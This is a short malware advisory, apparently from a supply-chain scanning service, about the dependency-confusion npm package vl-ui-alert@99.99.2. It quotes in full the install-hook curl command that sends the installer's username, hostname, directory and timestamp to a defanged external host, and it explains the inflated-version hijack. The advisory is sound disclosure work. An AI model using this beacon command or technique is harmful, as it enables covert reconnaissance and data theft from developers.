LWA-2026-5434 confirmed malware

vl-ui-alert@99.99.2

Malicious code in vl-ui-alert (npm)

T1195.002 · Compromise Software Supply ChainT1059.004 · Unix ShellT1082 · System Information DiscoveryT1071.001 · Web ProtocolsT1041 · Exfiltration Over C2 Channel

Analysis

Dependency-confusion package vl-ui-alert@99.99.2 that beacons host metadata on install. The package contains no functional code (index.js is a single-line comment only). Both preinstall and postinstall hooks execute: curl -s "hxxps://178fx66q[.]instances[.]httpworkbench[.]com/depconf/?pkg=vl-ui-alert&u=$(whoami)&h=$(hostname)&d=$PWD&t=$(date +%s)" > /dev/null || true. This exfiltrates the installer's username, hostname, current working directory, and timestamp to an external recon panel at 178fx66q[.]instances[.]httpworkbench[.]com. The /depconf/ path segment suggests the server is collecting dependency-confusion victims. The version is set to 99.99.2 to hijack npm version resolution over any legitimate version of vl-ui-alert.

analyzed by
Leitwacht
first seen
Jun 15, 2026, 08:58 PM
analyzed
Jun 15, 2026, 08:59 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.